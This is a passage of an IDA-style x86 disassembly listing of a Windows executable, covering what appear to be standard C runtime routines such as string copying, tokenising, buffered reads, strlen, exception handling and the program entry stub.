shr ecx, 2
jnz loc_4039BF
jmp short loc_403963
; ---------------------------------------------------------------------------
loc_40393C: ; CODE XREF: sub_403910+1F�j
; sub_403910+45�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
sub ecx, 1
jz short loc_403976
test al, al
jz short loc_40397E
test esi, 3
jnz short loc_40393C
mov ebx, ecx
shr ecx, 2
jnz short loc_4039BF
loc_40395E: ; CODE XREF: sub_403910+AD�j
and ebx, 3
jz short loc_403976
loc_403963: ; CODE XREF: sub_403910+2A�j
; sub_403910+64�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
test al, al
jz short loc_4039A8
sub ebx, 1
jnz short loc_403963
loc_403976: ; CODE XREF: sub_403910+39�j
; sub_403910+51�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_40397E: ; CODE XREF: sub_403910+3D�j
test edi, 3
jz short loc_40399C
loc_403986: ; CODE XREF: sub_403910+8A�j
mov [edi], al
add edi, 1
sub ecx, 1
jz loc_403A2C
test edi, 3
jnz short loc_403986
loc_40399C: ; CODE XREF: sub_403910+74�j
mov ebx, ecx
shr ecx, 2
jnz short loc_403A17
loc_4039A3: ; CODE XREF: sub_403910+9B�j
; sub_403910+116�j
mov [edi], al
add edi, 1
loc_4039A8: ; CODE XREF: sub_403910+5F�j
sub ebx, 1
jnz short loc_4039A3
pop ebx
pop esi
loc_4039AF: ; CODE XREF: sub_403910+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4039B5: ; CODE XREF: sub_403910+C7�j
; sub_403910+DF�j
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_40395E
loc_4039BF: ; CODE XREF: sub_403910+24�j
; sub_403910+4C�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_4039B5
test dl, dl
jz short loc_403A09
test dh, dh
jz short loc_4039FF
test edx, 0FF0000h
jz short loc_4039F5
test edx, 0FF000000h
jnz short loc_4039B5
mov [edi], edx
jmp short loc_403A0D
; ---------------------------------------------------------------------------
loc_4039F5: ; CODE XREF: sub_403910+D7�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_403A0D
; ---------------------------------------------------------------------------
loc_4039FF: ; CODE XREF: sub_403910+CF�j
and edx, 0FFh
mov [edi], edx
jmp short loc_403A0D
; ---------------------------------------------------------------------------
loc_403A09: ; CODE XREF: sub_403910+CB�j
xor edx, edx
mov [edi], edx
loc_403A0D: ; CODE XREF: sub_403910+E3�j
; sub_403910+ED�j ...
add edi, 4
xor eax, eax
sub ecx, 1
jz short loc_403A23
loc_403A17: ; CODE XREF: sub_403910+91�j
xor eax, eax
loc_403A19: ; CODE XREF: sub_403910+111�j
mov [edi], eax
add edi, 4
sub ecx, 1
jnz short loc_403A19
loc_403A23: ; CODE XREF: sub_403910+105�j
and ebx, 3
jnz loc_4039A3
loc_403A2C: ; CODE XREF: sub_403910+7E�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_403910 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A34 proc near ; CODE XREF: sub_417676+1D�p
; sub_417676+5A�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
mov [ebp+var_2C], eax
call sub_40539D
push 8
pop ecx
mov [ebp+var_28], eax
xor eax, eax
lea edi, [ebp+var_24]
push 7
rep stosd
pop edi
loc_403A65: ; CODE XREF: sub_403A34+4A�j
mov dl, [esi]
movzx ecx, dl
mov eax, ecx
and ecx, edi
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+var_24]
or [eax], bl
inc esi
test dl, dl
jnz short loc_403A65
mov edx, [ebp+var_2C]
test edx, edx
jnz short loc_403A94
mov eax, [ebp+var_28]
mov edx, [eax+18h]
jmp short loc_403A94
; ---------------------------------------------------------------------------
loc_403A8F: ; CODE XREF: sub_403A34+77�j
test al, al
jz short loc_403AAD
inc edx
loc_403A94: ; CODE XREF: sub_403A34+51�j
; sub_403A34+59�j
mov al, [edx]
movzx esi, al
xor ebx, ebx
mov ecx, esi
and ecx, edi
inc ebx
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test bl, cl
jnz short loc_403A8F
loc_403AAD: ; CODE XREF: sub_403A34+5D�j
mov ebx, edx
jmp short loc_403AC9
; ---------------------------------------------------------------------------
loc_403AB1: ; CODE XREF: sub_403A34+98�j
movzx esi, byte ptr [edx]
xor eax, eax
mov ecx, esi
and ecx, edi
inc eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test al, cl
jnz short loc_403AD0
inc edx
loc_403AC9: ; CODE XREF: sub_403A34+7B�j
cmp byte ptr [edx], 0
jnz short loc_403AB1
jmp short loc_403AD4
; ---------------------------------------------------------------------------
loc_403AD0: ; CODE XREF: sub_403A34+92�j
mov byte ptr [edx], 0
inc edx
loc_403AD4: ; CODE XREF: sub_403A34+9A�j
mov eax, [ebp+var_28]
mov ecx, [ebp+var_4]
mov [eax+18h], edx
mov eax, ebx
sub eax, edx
neg eax
sbb eax, eax
pop edi
and eax, ebx
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_403A34 endp
; =============== S U B R O U T I N E =======================================
sub_403AF3 proc near ; CODE XREF: sub_41B3D0+70�p
; sub_41B3D0+160�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_403B1A
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_403B1A: ; CODE XREF: sub_403AF3+9�j
mov eax, [eax+0Ch]
and eax, 10h
pop esi
retn
sub_403AF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B22 proc near ; CODE XREF: sub_403CB8+A1�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
test edi, edi
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
jz loc_403C72
cmp [ebp+arg_C], 0
jz loc_403C72
imul edi, [ebp+arg_C]
mov esi, [ebp+arg_10]
test word ptr [esi+0Ch], 10Ch
mov [ebp+var_10], edi
mov ebx, edi
jz short loc_403B68
mov eax, [esi+18h]
mov [ebp+var_C], eax
jmp short loc_403B6F
; ---------------------------------------------------------------------------
loc_403B68: ; CODE XREF: sub_403B22+3C�j
mov [ebp+var_C], 1000h
loc_403B6F: ; CODE XREF: sub_403B22+44�j
test edi, edi
jz loc_403C3E
loc_403B77: ; CODE XREF: sub_403B22+116�j
test word ptr [esi+0Ch], 10Ch
jz short loc_403BC0
mov eax, [esi+4]
test eax, eax
jz short loc_403BC0
jl loc_403CA3
cmp ebx, eax
mov edi, ebx
jb short loc_403B94
mov edi, eax
loc_403B94: ; CODE XREF: sub_403B22+6E�j
cmp edi, [ebp+var_4]
ja loc_403C43
push edi
push dword ptr [esi]
push [ebp+var_4]
push [ebp+var_8]
call sub_402F72
sub [esi+4], edi
add [esi], edi
add [ebp+var_8], edi
sub ebx, edi
add esp, 10h
sub [ebp+var_4], edi
mov edi, [ebp+var_10]
jmp short loc_403C36
; ---------------------------------------------------------------------------
loc_403BC0: ; CODE XREF: sub_403B22+5B�j
; sub_403B22+62�j
cmp ebx, [ebp+var_C]
jb short loc_403C0E
cmp [ebp+var_C], 0
mov eax, ebx
jz short loc_403BD6
xor edx, edx
div [ebp+var_C]
mov eax, ebx
sub eax, edx
loc_403BD6: ; CODE XREF: sub_403B22+A9�j
cmp eax, [ebp+var_4]
ja loc_403C79
push eax
push [ebp+var_8]
push esi
call sub_408A20
pop ecx
push eax
call sub_40A34F
add esp, 0Ch
test eax, eax
jz loc_403CB2
cmp eax, 0FFFFFFFFh
jz loc_403CA3
add [ebp+var_8], eax
sub ebx, eax
sub [ebp+var_4], eax
jmp short loc_403C36
; ---------------------------------------------------------------------------
loc_403C0E: ; CODE XREF: sub_403B22+A1�j
push esi
call sub_409C8D
cmp eax, 0FFFFFFFFh
pop ecx
jz loc_403CA7
cmp [ebp+var_4], 0
jz short loc_403C79
mov ecx, [ebp+var_8]
inc [ebp+var_8]
mov [ecx], al
mov eax, [esi+18h]
dec ebx
dec [ebp+var_4]
mov [ebp+var_C], eax
loc_403C36: ; CODE XREF: sub_403B22+9C�j
; sub_403B22+EA�j
test ebx, ebx
jnz loc_403B77
loc_403C3E: ; CODE XREF: sub_403B22+4F�j
mov eax, [ebp+arg_C]
jmp short loc_403C74
; ---------------------------------------------------------------------------
loc_403C43: ; CODE XREF: sub_403B22+75�j
xor esi, esi
cmp [ebp+arg_4], 0FFFFFFFFh
jz short loc_403C5A
push [ebp+arg_4]
push esi
push [ebp+arg_0]
call sub_407B70
add esp, 0Ch
loc_403C5A: ; CODE XREF: sub_403B22+127�j
call sub_4057D3
push esi
push esi
push esi
push esi
mov dword ptr [eax], 22h
push esi
loc_403C6A: ; CODE XREF: sub_403B22+17F�j
call sub_402F39
add esp, 14h
loc_403C72: ; CODE XREF: sub_403B22+1A�j
; sub_403B22+24�j
xor eax, eax
loc_403C74: ; CODE XREF: sub_403B22+11F�j
; sub_403B22+18E�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_403C79: ; CODE XREF: sub_403B22+B7�j
; sub_403B22+100�j
cmp [ebp+arg_4], 0FFFFFFFFh
jz short loc_403C8F
push [ebp+arg_4]
push 0
push [ebp+arg_0]
call sub_407B70
add esp, 0Ch
loc_403C8F: ; CODE XREF: sub_403B22+15B�j
call sub_4057D3
mov dword ptr [eax], 22h
xor eax, eax
push eax
push eax
push eax
push eax
push eax
jmp short loc_403C6A
; ---------------------------------------------------------------------------
loc_403CA3: ; CODE XREF: sub_403B22+64�j
; sub_403B22+DC�j
or dword ptr [esi+0Ch], 20h
loc_403CA7: ; CODE XREF: sub_403B22+F6�j
; sub_403B22+194�j
mov eax, edi
sub eax, ebx
xor edx, edx
div [ebp+arg_8]
jmp short loc_403C74
; ---------------------------------------------------------------------------
loc_403CB2: ; CODE XREF: sub_403B22+D3�j
or dword ptr [esi+0Ch], 10h
jmp short loc_403CA7
sub_403B22 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403CB8 proc near ; CODE XREF: sub_403D7F+12�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push 0Ch
push 6A5D57h
call __SEH_prolog4
xor esi, esi
mov [ebp+var_1C], esi
mov ebx, [ebp+arg_8]
cmp ebx, esi
jz short loc_403CFB
mov edi, [ebp+arg_C]
cmp edi, esi
jz short loc_403CFB
xor eax, eax
cmp [ebp+arg_0], esi
setnz al
cmp eax, esi
jnz short loc_403D03
loc_403CE3: ; CODE XREF: sub_403CB8+7A�j
; sub_403CB8+88�j
call sub_4057D3
mov dword ptr [eax], 16h
push esi
push esi
push esi
push esi
push esi
call sub_402F39
add esp, 14h
loc_403CFB: ; CODE XREF: sub_403CB8+16�j
; sub_403CB8+1D�j
xor eax, eax
loc_403CFD: ; CODE XREF: sub_403CB8+BB�j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_403D03: ; CODE XREF: sub_403CB8+29�j
cmp [ebp+arg_10], esi
jz short loc_403D13
or eax, 0FFFFFFFFh
xor edx, edx
div ebx
cmp edi, eax
jbe short loc_403D42
loc_403D13: ; CODE XREF: sub_403CB8+4E�j
cmp [ebp+arg_4], 0FFFFFFFFh
jz short loc_403D28
push [ebp+arg_4]
push esi
push [ebp+arg_0]
call sub_407B70
add esp, 0Ch
loc_403D28: ; CODE XREF: sub_403CB8+5F�j
xor eax, eax
cmp [ebp+arg_10], esi
setnz al
cmp eax, esi
jz short loc_403CE3
or eax, 0FFFFFFFFh
xor edx, edx
div ebx
cmp eax, edi
sbb eax, eax
inc eax
jz short loc_403CE3
loc_403D42: ; CODE XREF: sub_403CB8+59�j
push [ebp+arg_10]
call sub_40815B
pop ecx
mov [ebp+ms_exc.disabled], esi
push [ebp+arg_10]
push edi
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call sub_403B22
add esp, 14h
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_403D75
mov eax, [ebp+var_1C]
jmp short loc_403CFD
sub_403CB8 endp
; =============== S U B R O U T I N E =======================================
sub_403D75 proc near ; CODE XREF: sub_403CB8+B3�p
; DATA XREF: .kSjx934:00421400�o
push dword ptr [ebp+18h]
call sub_4081AD
pop ecx
retn
sub_403D75 endp
; =============== S U B R O U T I N E =======================================
sub_403D7F proc near ; CODE XREF: sub_41B3D0+D6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
push [esp+4+arg_8]
push [esp+8+arg_4]
push 0FFFFFFFFh
push [esp+10h+arg_0]
call sub_403CB8
add esp, 14h
retn
sub_403D7F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403DA0 proc near ; CODE XREF: sub_41A9DE+59E�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = qword ptr 4
cmp ds:dword_433C78, 0
jz sub_40A6EF
sub esp, 8
stmxcsr [esp+8+var_4]
mov eax, [esp+8+var_4]
and eax, 1F80h
cmp eax, 1F80h
jnz short loc_403DD4
fnstcw word ptr [esp+8+var_8]
mov ax, word ptr [esp+8+var_8]
and ax, 7Fh
cmp ax, 7Fh
loc_403DD4: ; CODE XREF: sub_403DA0+23�j
lea esp, [esp+8]
jnz sub_40A6EF
jmp short $+2
movq xmm0, [esp+arg_0]
movapd xmm2, oword ptr ds:oword_41D3A0
movapd xmm1, xmm0
movapd xmm7, xmm0
psrlq xmm0, 34h
movd eax, xmm0
andpd xmm0, oword ptr ds:oword_41D3C0
psubd xmm2, xmm0
psrlq xmm1, xmm2
test eax, 800h
jz short loc_403E62
cmp eax, 0BFFh
jl short loc_403E9A
psllq xmm1, xmm2
cmp eax, 0C32h
jg short loc_403E33
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_403E33: ; CODE XREF: sub_403DA0+86�j
; sub_403DA0+E1�j
ucomisd xmm7, xmm7
jnp short loc_403E5D
mov edx, 3ECh
sub esp, 10h
mov [esp+10h+var_4], edx
mov edx, esp
add edx, 14h
mov [esp+10h+var_8], edx
mov [esp+10h+var_C], edx
mov [esp+10h+var_10], edx
call sub_40A42B
add esp, 10h
loc_403E5D: ; CODE XREF: sub_403DA0+97�j
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_403E62: ; CODE XREF: sub_403DA0+74�j
movq xmm0, [esp+arg_0]
psllq xmm1, xmm2
movapd xmm3, xmm0
cmppd xmm0, xmm1, 6
cmp eax, 3FFh
jl short loc_403EA1
cmp eax, 432h
jg short loc_403E33
andpd xmm0, oword ptr ds:oword_41D390
addsd xmm1, xmm0
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_403E9A: ; CODE XREF: sub_403DA0+7B�j
fld ds:dbl_41D3D0
retn
; ---------------------------------------------------------------------------
loc_403EA1: ; CODE XREF: sub_403DA0+DA�j
cmppd xmm3, oword ptr ds:oword_41D3B0, 6
andpd xmm3, oword ptr ds:oword_41D390
movq [esp+arg_0], xmm3
fld [esp+arg_0]
retn
sub_403DA0 endp
; =============== S U B R O U T I N E =======================================
sub_403EBD proc near ; CODE XREF: sub_403ECE�j
; sub_4102B0+35�p
arg_0 = dword ptr 4
push 0Ah
push 0
push [esp+8+arg_0]
call sub_40A9EB
add esp, 0Ch
retn
sub_403EBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403ECE proc near ; CODE XREF: sub_401F1C+11C�p
; sub_401F1C+128�p ...
jmp sub_403EBD
sub_403ECE endp
; =============== S U B R O U T I N E =======================================
sub_403ED3 proc near ; CODE XREF: .kSjx934:00403F78�p
; .kSjx934:00404015�p ...
arg_0 = dword ptr 4
cmp ds:dword_425A9C, 1
jnz short loc_403EE1
call sub_409C54
loc_403EE1: ; CODE XREF: sub_403ED3+7�j
push [esp+arg_0]
call sub_409AB4
push 0FFh
call sub_4078A7
pop ecx
pop ecx
retn
sub_403ED3 endp
; =============== S U B R O U T I N E =======================================
sub_403EF7 proc near ; CODE XREF: .kSjx934:00403FFD�p
cmp word ptr ds:400000h, 5A4Dh
jnz short loc_403F35
mov eax, ds:40003Ch
cmp dword ptr [eax+400000h], 4550h
jnz short loc_403F35
cmp word ptr [eax+400018h], 10Bh
jnz short loc_403F35
cmp dword ptr [eax+400074h], 0Eh
jbe short loc_403F35
xor ecx, ecx
cmp [eax+4000E8h], ecx
setnz cl
mov eax, ecx
retn
; ---------------------------------------------------------------------------
loc_403F35: ; CODE XREF: sub_403EF7+9�j
; sub_403EF7+1A�j ...
xor eax, eax
retn
sub_403EF7 endp
; ---------------------------------------------------------------------------
loc_403F38: ; CODE XREF: .kSjx934:0040411D�j
push 60h
push offset dword_421408
call __SEH_prolog4
and dword ptr [ebp-4], 0
lea eax, [ebp-70h]
push eax
call ds:dword_41D1A8
mov dword ptr [ebp-4], 0FFFFFFFEh
mov edi, 94h
push edi
push 0
mov ebx, ds:dword_41D100
call ebx
push eax
call ds:dword_41D114
mov esi, eax
test esi, esi
jnz short loc_403F83
push 12h
call sub_403ED3
pop ecx
jmp loc_40410D
; ---------------------------------------------------------------------------
loc_403F83: ; CODE XREF: .kSjx934:00403F74�j
mov [esi], edi
push esi
call ds:dword_41D068
push esi
push 0
test eax, eax
jnz short loc_403FA1
call ebx
push eax
call ds:dword_41D10C
jmp loc_40410D
; ---------------------------------------------------------------------------
loc_403FA1: ; CODE XREF: .kSjx934:00403F91�j
mov eax, [esi+10h]
mov [ebp-20h], eax
mov eax, [esi+4]
mov [ebp-24h], eax
mov eax, [esi+8]
mov [ebp-28h], eax
mov edi, [esi+0Ch]
and edi, 7FFFh
call ebx
push eax
call ds:dword_41D10C
mov esi, [ebp-20h]
cmp esi, 2
jz short loc_403FD3
or edi, 8000h
loc_403FD3: ; CODE XREF: .kSjx934:00403FCB�j
mov ecx, [ebp-24h]
mov eax, ecx
shl eax, 8
mov edx, [ebp-28h]
add eax, edx
mov ds:dword_425F78, esi
mov ds:dword_425F80, eax
mov ds:dword_425F84, ecx
mov ds:dword_425F88, edx
mov ds:dword_425F7C, edi
call sub_403EF7
mov [ebp-20h], eax
xor ebx, ebx
inc ebx
push ebx
call sub_405A83
pop ecx
test eax, eax
jnz short loc_40401B
push 1Ch
call sub_403ED3
pop ecx
loc_40401B: ; CODE XREF: .kSjx934:00404011�j
call sub_4054D6
test eax, eax
jnz short loc_40402C
push 10h
call sub_403ED3
pop ecx
loc_40402C: ; CODE XREF: .kSjx934:00404022�j
call sub_40B042
mov [ebp-4], ebx
call sub_4087E0
test eax, eax
jge short loc_404045
push 1Bh
call sub_40785D
pop ecx
loc_404045: ; CODE XREF: .kSjx934:0040403B�j
call ds:dword_41D1A4
mov ds:dword_434DF8, eax
call sub_40AF0D
mov ds:dword_425A94, eax
call sub_40AE54
test eax, eax
jge short loc_40406B
push 8
call sub_40785D
pop ecx
loc_40406B: ; CODE XREF: .kSjx934:00404061�j
call sub_40ABE1
test eax, eax
jge short loc_40407C
push 9
call sub_40785D
pop ecx
loc_40407C: ; CODE XREF: .kSjx934:00404072�j
push ebx
call sub_407979
pop ecx
test eax, eax
jz short loc_40408E
push eax
call sub_40785D
pop ecx
loc_40408E: ; CODE XREF: .kSjx934:00404085�j
call sub_40AB84
test [ebp-44h], bl
jz short loc_40409E
movzx ecx, word ptr [ebp-40h]
jmp short loc_4040A1
; ---------------------------------------------------------------------------
loc_40409E: ; CODE XREF: .kSjx934:00404096�j
push 0Ah
pop ecx
loc_4040A1: ; CODE XREF: .kSjx934:0040409C�j
push ecx
push eax
push 0
push 400000h
call loc_41BBE3
mov [ebp-1Ch], eax
cmp dword ptr [ebp-20h], 0
jnz short loc_4040BE
push eax
call sub_407AD9
loc_4040BE: ; CODE XREF: .kSjx934:004040B6�j
call sub_407AFB
jmp short loc_4040F3
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-2Ch], ecx
push eax
push ecx
call sub_40AA15
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov eax, [ebp-2Ch]
mov [ebp-1Ch], eax
cmp dword ptr [ebp-20h], 0
jnz short loc_4040EE
push eax
call sub_407AEA
loc_4040EE: ; CODE XREF: .kSjx934:004040E6�j
call sub_407B0A
loc_4040F3: ; CODE XREF: .kSjx934:004040C3�j
mov dword ptr [ebp-4], 0FFFFFFFEh
mov eax, [ebp-1Ch]
jmp short loc_404112
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFEh
loc_40410D: ; CODE XREF: .kSjx934:00403F7E�j
; .kSjx934:00403F9C�j
mov eax, 0FFh
loc_404112: ; CODE XREF: .kSjx934:004040FD�j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
call sub_40B08A
jmp loc_403F38
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404130 proc near ; CODE XREF: sub_402C0C+16�p
; sub_402C72+21�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_404160
loc_40413C: ; CODE XREF: sub_404130+1B�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_404193
test ecx, 3
jnz short loc_40413C
add eax, 0
lea esp, [esp+0]
lea esp, [esp+0]
loc_404160: ; CODE XREF: sub_404130+A�j
; sub_404130+46�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_404160
mov eax, [ecx-4]
test al, al
jz short loc_4041B1
test ah, ah
jz short loc_4041A7
test eax, 0FF0000h
jz short loc_40419D
test eax, 0FF000000h
jz short loc_404193
jmp short loc_404160
; ---------------------------------------------------------------------------
loc_404193: ; CODE XREF: sub_404130+13�j
; sub_404130+5F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40419D: ; CODE XREF: sub_404130+58�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_4041A7: ; CODE XREF: sub_404130+51�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_4041B1: ; CODE XREF: sub_404130+4D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_404130 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041BB proc near ; CODE XREF: sub_40121E+58�p
; sub_40150F+F�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, offset dword_41D3D8
lea edi, [ebp+var_20]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
test eax, eax
pop edi
mov [ebp+var_4], eax
pop esi
jz short loc_4041EE
test byte ptr [eax], 8
jz short loc_4041EE
mov [ebp+var_C], 1994000h
loc_4041EE: ; CODE XREF: sub_4041BB+25�j
; sub_4041BB+2A�j
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_1C]
push [ebp+var_20]
call ds:dword_41D1AC
leave
retn 8
sub_4041BB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404205 proc near ; CODE XREF: sub_40B8A9+65�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov ebp, [ebp+var_4]
mov esp, [ebx-4]
jmp eax
sub_404205 endp
; ---------------------------------------------------------------------------
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_404235 proc near ; CODE XREF: sub_40B3C2+31�p
; sub_40B818+59�p ...
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_404235 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40423C proc near ; CODE XREF: sub_4043C9+69�p
; sub_40B8A9:loc_40B8D1�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, large fs:0
mov [ebp+var_4], esi
mov [ebp+var_8], offset loc_404265
push 0
push [ebp+arg_4]
push [ebp+var_8]
push [ebp+arg_0]
call sub_413976
loc_404265: ; DATA XREF: sub_40423C+12�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and eax, 0FFFFFFFDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov edi, large fs:0
mov ebx, [ebp+var_4]
mov [ebx], edi
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_40423C endp
; ---------------------------------------------------------------------------
loc_40428E: ; CODE XREF: .kSjx934:0041C1E9�j
; .kSjx934:0041C204�j ...
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40BD75
add esp, 20h
mov [ebp-8], eax
pop edi
pop esi
pop ebx
mov eax, [ebp-8]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4042C4: ; DATA XREF: sub_40456E+24�o
push esi
cld
mov esi, [esp+0Ch]
mov ecx, [esi+8]
xor ecx, esi
call sub_402710
push 0
push esi
push dword ptr [esi+14h]
push dword ptr [esi+0Ch]
push 0
push dword ptr [esp+24h]
push dword ptr [esi+10h]
push dword ptr [esp+24h]
call sub_40BD75
add esp, 20h
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4042F4 proc near ; CODE XREF: sub_4043C9+81�p
; sub_40B915+53�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
cmp [ebp+arg_0], 123h
jnz short loc_404316
mov eax, offset loc_40439D
mov ecx, [ebp+arg_4]
mov [ecx], eax
xor eax, eax
inc eax
jmp loc_4043C6
; ---------------------------------------------------------------------------
loc_404316: ; CODE XREF: sub_4042F4+E�j
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_4043C9
mov eax, ds:dword_423064
lea ecx, [ebp+var_28]
xor eax, ecx
mov [ebp+var_20], eax
mov eax, [ebp+arg_10]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_18], eax
mov eax, [ebp+arg_14]
mov [ebp+var_14], eax
mov eax, [ebp+arg_18]
mov [ebp+var_10], eax
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_38], 1
mov eax, [ebp+arg_0]
mov [ebp+var_34], eax
mov eax, [ebp+arg_8]
mov [ebp+var_30], eax
call sub_40539D
mov eax, [eax+80h]
mov [ebp+var_2C], eax
lea eax, [ebp+var_34]
